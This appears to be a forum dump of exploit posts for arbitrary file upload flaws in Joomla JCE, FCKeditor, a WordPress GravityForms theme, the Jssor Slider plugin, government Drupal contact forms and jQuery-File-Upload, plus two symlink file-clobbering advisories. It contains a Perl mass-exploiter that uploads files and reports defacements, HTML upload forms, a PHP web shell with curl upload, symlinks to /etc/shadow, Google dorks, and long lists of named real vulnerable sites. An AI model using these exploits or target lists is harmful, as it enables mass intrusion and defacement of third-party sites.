Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ################################################################################# Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. The component is prone to a the following security vulnerabilities: 1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script. 2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Affected JCE 2.1.0 is vulnerable; other versions may also be affected. References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481 References => https://www.securityfocus.com/bid/53630 Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png ################################################################################# Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability. One Attacker must execute with remote file upload code. Watch Videos from Original Sources => Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ################################################################################# You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished # Uploaded File/Image Directory Path => TARGETDOMAIN/yourfilename.png .jpg .gif TARGETDOMAIN/images/yourfilename.png .jpg .gif ################################################################################# Example Vulnerable Sites => aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload THE END ################################################################################# Discovered By KingSkrupellos from Cyberizm Digital Security Team #################################################################################
  7. # Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz # Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060297 ################################################################################################# # Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html # Path : TARGET/files/.... ################################################################################################# # Example Vulnerable Sites : designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html jn-models.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ardewo.cz/eshop/fckeditor/editor/filemanager/connectors/uploadtest.html chalupaholubov.cz/fckeditor/editor/filemanager/connectors/uploadtest.html seftrade.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ################################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  8. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> [img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png] Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png] # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png] # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. # Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 [img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png] ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  9. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : argentina.gob.ar/paisdigital # Tested On : Windows # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060021 ################################################################################################# # Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar # Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar # Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar # Exploit : /?q=contacto # Path : /sites/default/files/webform/.... # Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx. ################################################################################################# # Target IP Address => 186.33.254.182 # Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS pellegrini.gov.ar magdalena.gob.ar marull.gob.ar pampablanca.gob.ar municipalidaddeabrapampa.gob.ar saladillo.gob.ar lasflores.gob.ar municipalidaddearrayanal.gob.ar palmasola.gob.ar frailepintado.gob.ar rinconada.gob.ar montedelosgauchos.gob.ar trescruces.gob.ar generallavalle.gob.ar vinalito.gob.ar puestoviejo.gob.ar balcarce.gob.ar ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  10. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/06/2018 # Vendor Homepage : regione.toscana.it - jquery.com # Tested On : Windows # Version : 7 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060240 ################################################################################################# # Google Dorks : intext:''Scrivi al Comune'' site:fi.it Il testo del tuo messaggio * site:fi.it # Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19 # Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/..... # Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx. # Don't forget to put www. before comune. on the URL Address bar. ################################################################################################# # Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH www.comune.vicchio.fi.it/segnalazioni-e-reclami-0 www.comunebarberino.it/scrivi-al-comune www.comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0 www.comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0 www.comune.rignano-sullarno.fi.it/scrivi-al-comune www.comune.pontassieve.fi.it/scrivi-al-comune-0 www.comune.marradi.fi.it/scrivi-al-comune www.comune.dicomano.fi.it/scrivi-al-comune-0 www.comune.reggello.fi.it/scrivi-al-comune-0 www.comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune www.comune.scarperiaesanpiero.fi.it/scrivi-al-comune www.comune.provagliodiseo.bs.it/node/19 www.comune.terni.it/scrivi-al-comune ################################################################################################ Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  11. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  12. vvvvvvvv *************************************************** # Exploit Title: Đăng nhập Arbitrary File Upload # Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 12/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html [+] Upload your backdoor with bypass ext *************************************************** [+] Demo Site [+] https://thietbibepkanzler.vn/editor/fileman/aklsdjfklsdjflksdkl.html [+] http://kientrucla.com/editor/fileman/aklsdjfklsdjflksdkl.html [+] https://www.songhonghanoi.com/editor/fileman/aklsdjfklsdjflksdkl.html *************************************************** Thanks To Indonesia To World Team
  13. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-none] Download Site: https://github.com/blueimp/jQuery-File-Upload/releases Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?>
  14. *************************************************** # Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 03/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] Upload your file with csrf, post file files[] [+] Upload shell must with bypass ext [+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg *************************************************** [+] Demo Site [+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php *************************************************** Thanks To Indonesia To World Team
  15. Title: IBM Informix File Clobbering during Install Author: Larry W. Cashdollar, @_larry0 Date: 2006-10-01 CVE-ID:[CVE-2006-5163] Download Site: http://www14.software.ibm.com/webapp/download/preconfig.jsp?id=2013-03-26+02%3A55%3A11.385011R&S_TACT=&S_CMP= Vendor: IBM Vendor Notified: 2006-10-01 Vendor Contact: Advisory: http://www.vapid.dhs.org/advisories/ibm_informix_dynamic_server_file_clobbber_during_install.html Description: IBM Informix Dynamic Server (IDS) is a strategic data server in the IBM Information Management Software portfolio that provides blazing online transaction processing (OLTP) performance, legendary reliability, and nearly hands-free administration to businesses of all sizes. IDS 10 offers significant improvements in performance, availability, security, and manageability over previous versions, including patent-pending technology that virtually eliminates downtime and automates many of the tasks associated with deploying mission-critical enterprise systems. Vulnerability: During installation the installserver script creates a file in /tmp called installserver.txt an unprivileged user can symlink this file to another file causing the target file have the contents of installserver.txt appened to it. vapid:/tmp# ls -l /tmp/installserver.txt lrwxrwxrwx 1 lwc lwc 11 Oct 1 18:27 /tmp/installserver.txt -> /etc/passwd After installation the contents of installserver.txt was appened to /etc/passwd. The default file permissions of the installation package are too open, an unprivileged user can take advantage of an installation by a privileged user by injecting code into the installer script. nobody@vapid:/home/auditor/test$ ls -l total 273168 -rw-rw-rw- 1 root root 10328050 Aug 1 2005 Gls.rpm -rw-rw-rw- 1 32100 1360 5125418 Aug 1 2005 IIF.jar -rw-rw-rw- 1 root root 84374286 Aug 1 2005 IIFServer.rpm -rw-rw-rw- 1 root root 786557 Aug 1 2005 Message.rpm drwxrwxrwx 2 32100 1360 4096 Aug 1 2005 doc -rw-r--r-- 1 auditor auditor 140032000 Oct 1 18:21 iif.10.00.UC3R1TL.Linux.tar -rwxr-xr-x 1 32100 1360 4424 Aug 1 2005 install_rpm -rwxrwxrwx 1 32100 1360 38727685 Oct 1 18:46 installserver -rwxr-xr-x 1 32100 1360 5069 Aug 1 2005 server.ini
  16. Title: PatchLink Update Unix Client File clobbering vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2008-01-17 CVE-ID:[CVE-2008-0525] Download Site: http://lumension.com/patch-management.jsp?rpLangCode=1&rpMenuId=118443 Vendor: http://lumension.com Vendor Notified: 2008-01-17 Vendor Contact: bugtraq Advisory: http://www.vapid.dhs.org/advisories/patchlink_update_unix_client_file_clobber_vulnerability.html Description: PatchLink Updateâ„¢ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats. Vulnerability: The log rotation utility "logtrimmer" utilizes space in /tmp improperly and is subject to a symlink attack. By creating a targeted symlink a non root user can clobber root owned files causing DoS. Export: JSON TEXT XML Exploit Code: nobody:/tmp> ln -s /etc/shadow patchlink.tmp After logs are rotated /etc/shadow will be size 0, since patchlink.tmp is removed by logtrimmer after the log rotation process has finished.
